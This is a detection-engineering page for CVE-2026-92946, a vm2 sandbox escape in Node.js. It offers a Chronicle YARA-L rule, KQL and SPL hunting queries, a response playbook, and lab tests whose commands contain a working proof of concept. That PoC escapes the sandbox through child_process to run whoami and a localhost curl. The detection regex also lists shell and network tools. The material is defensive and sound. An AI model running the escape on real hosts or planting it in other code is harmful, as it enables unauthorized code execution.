CVE-2026-92946 Google Chronicle · YARA-L

Detect vm2 NodeVM require.external Sandbox Escape to RCE (CVE-2026-92946) in Google Chronicle

Detects exploitation and presence of CVE-2026-92946, a critical (CVSS 10.0) sandbox-escape vulnerability in the vm2 JavaScript sandbox library (npm package 'vm2') at versions <= 3.11.6. When a NodeVM is configured with `require.external` enabled but without an explicit `require.root` allow-list, the sandbox fails to constrain module resolution (CWE-913: Improper Control of Dynamically-Managed Code Resources), permitting sandboxed scripts to require arbitrary host filesystem modules (e.g. 'child_process', 'fs') and achieve full remote code execution on the host. This detection surfaces vulnerable vm2 installs, suspicious child-process/filesystem activity spawned by Node.js processes hosting vm2, and PoC-style require patterns indicative of escape attempts.

MITRE ATT&CK

Tactic
Execution Initial Access

YARA-L Detection Query

Google Chronicle (YARA-L)
yaral
rule vm2_require_external_rce_cve_2026_92946 {
  meta:
    author = "Argus"
    description = "vm2 NodeVM require.external sandbox escape to RCE (CVE-2026-92946)"
    severity = "CRITICAL"
  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    re.regex($e.principal.process.parent_process.file.full_path, `(?i)node(\.exe)?$`)
    (
      re.regex($e.target.process.file.full_path, `(?i)(cmd\.exe|powershell\.exe|/sh|/bash|whoami|curl|wget|ncat)$`) or
      re.regex($e.target.process.command_line, `(?i)child_process`)
    )
    (
      re.regex($e.target.process.command_line, `(?i)(vm2|require\.external)`) or
      re.regex($e.principal.process.command_line, `(?i)(vm2|require\.external)`)
    )
    $host = $e.principal.hostname
  match:
    $host over 5m
  condition:
    $e
}
critical severity medium confidence

Chronicle YARA-L rule detecting node-parented shell/recon process launches correlated with vm2/require.external indicators for CVE-2026-92946.

Data Sources

EDR process telemetrySysmon via Chronicle forwarder

Required Tables

events

False Positives & Tuning

  • Node build tooling spawning subshells
  • CI agents under node invoking CLI tools
  • Test harnesses exercising vm2

Other platforms for CVE-2026-92946


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Install vulnerable vm2 and trigger require.external escape (lab)

    Expected signal: Sysmon/auditd process-creation event: node parent spawning a 'whoami' child process; npm install writing node_modules/vm2 at version 3.11.6.

  2. Test 2vm2 require.external spawns reverse-shell style command (lab)

    Expected signal: node -> sh -> curl process chain and a network connection attempt from the node process tree.

  3. Test 3Windows vm2 require.external escape to cmd.exe (lab)

    Expected signal: Sysmon EID 1: node.exe parent spawning cmd.exe -> whoami.exe; node_modules\vm2 at 3.11.6.


Response Playbook

Triage

  1. Confirm the affected host runs a Node.js application that depends on vm2 — inspect package.json / package-lock.json / node_modules/vm2/package.json for a version <= 3.11.6.
  2. Review the application source for NodeVM instantiation where `require.external` is enabled (true or an object) WITHOUT an explicit `require.root` allow-list — this is the vulnerable configuration.
  3. Examine the flagged child-process event: determine whether the spawned shell/recon command originated from untrusted script input passed into the sandbox.
  4. Correlate the timestamp with inbound requests or job inputs to identify the attacker-controlled payload that drove the require() call.

Containment

  1. Upgrade vm2 to 3.11.7 or later across all affected services, or remove vm2 entirely (the library is deprecated; migrate to isolated-vm or a separate-process sandbox).
  2. As an immediate mitigation, set an explicit `require.root` allow-list (or disable `require.external`) in every NodeVM configuration until the upgrade is deployed.
  3. Isolate the affected host from the network if host RCE is confirmed, and rotate any credentials/secrets accessible to the Node process.

Evidence Collection

  1. Capture the vulnerable application source, package-lock.json, and node_modules/vm2/package.json to preserve the exact vulnerable version.
  2. Collect process-creation telemetry (Sysmon EID 1 / auditd execve) for the node parent and all child processes around the event window.
  3. Preserve application and reverse-proxy access logs capturing the untrusted input submitted to the sandbox.

Escalation Criteria

  • !Escalate to incident response if a child process executed reconnaissance, established network connections, or wrote files outside the application directory — indicating confirmed host RCE.
  • !Escalate if the affected service is internet-facing or processes untrusted user-supplied scripts, given the CVSS 10.0 severity and public PoC availability.

Investigation Guide

Related Techniques

Forensic Artifacts

  • >node_modules/vm2/package.json showing version <= 3.11.6
  • >Process-creation records of node spawning shell/recon children
  • >Application logs containing the malicious require() payload submitted to the sandbox

Tuning Guidance

Build an allow-list of known-good Node applications that legitimately spawn shells (build tooling, CI runners) and exclude them by InitiatingProcessFolderPath or host. Focus alerting on internet-facing services and hosts where vm2 <= 3.11.6 is confirmed present. Tighten confidence to high when the parent command line explicitly references vm2/require.external and the child is a recon binary.


Hunting Queries

Baselines all Node.js processes that spawn shell children across the fleet so analysts can identify anomalous vm2-driven execution.

Hunting — KQL
kql
DeviceProcessEvents | where InitiatingProcessFileName in~ ("node.exe","node") | where FileName in~ ("cmd.exe","powershell.exe","bash","sh") | summarize count() by DeviceName, InitiatingProcessCommandLine, FileName, ProcessCommandLine
Hunting — SPL
spl
index=* (parent_process_name=node OR parent_process_name=node.exe) (process_name=*sh OR process_name=*cmd.exe OR process_name=*powershell.exe) | stats count by host, parent_process, process

Atomic Red Team Tests

Test 1 Install vulnerable vm2 and trigger require.external escape (lab)
linux

Installs vm2 3.11.6 and runs a NodeVM with require.external enabled but no require.root, executing a sandboxed script that requires child_process to run 'whoami' on the host.

Command

bash
mkdir -p /tmp/vm2poc && cd /tmp/vm2poc && npm init -y >/dev/null 2>&1 && npm install [email protected] >/dev/null 2>&1 && node -e "const {NodeVM}=require('vm2');const vm=new NodeVM({require:{external:true}});vm.run(\"require('child_process').execSync('whoami').toString()\",'poc.js')"

Cleanup

bash
rm -rf /tmp/vm2poc

Expected Telemetry

Sysmon/auditd process-creation event: node parent spawning a 'whoami' child process; npm install writing node_modules/vm2 at version 3.11.6.

Expected Detection

KQL/SPL/EDR rules fire on node spawning whoami with vm2/require.external context.

Test 2 vm2 require.external spawns reverse-shell style command (lab)
linux

Demonstrates full RCE by having the sandboxed script use child_process to invoke a host shell that runs an outbound curl, simulating attacker command execution.

Command

bash
cd /tmp/vm2poc && node -e "const {NodeVM}=require('vm2');const vm=new NodeVM({require:{external:true}});vm.run(\"require('child_process').execSync('sh -c \\\"id; curl -s http://127.0.0.1:9999/ || true\\\"')\",'poc.js')"

Cleanup

bash
rm -rf /tmp/vm2poc

Expected Telemetry

node -> sh -> curl process chain and a network connection attempt from the node process tree.

Expected Detection

Rules match node-parented sh/curl execution with vm2 indicators.

Test 3 Windows vm2 require.external escape to cmd.exe (lab)
windows

On Windows, installs vulnerable vm2 and uses require.external to spawn cmd.exe via child_process, demonstrating host RCE on Windows Node deployments.

Command

powershell
powershell -Command "mkdir C:\temp\vm2poc -Force; cd C:\temp\vm2poc; npm init -y; npm install [email protected]; node -e \"const {NodeVM}=require('vm2');const vm=new NodeVM({require:{external:true}});vm.run(`require('child_process').execSync('cmd.exe /c whoami').toString()`,'poc.js')\""

Cleanup

powershell
powershell -Command "Remove-Item -Recurse -Force C:\temp\vm2poc"

Expected Telemetry

Sysmon EID 1: node.exe parent spawning cmd.exe -> whoami.exe; node_modules\vm2 at 3.11.6.

Expected Detection

KQL DeviceProcessEvents / CrowdStrike CQL rules fire on node.exe spawning cmd.exe with vm2/require.external context.

Related Detections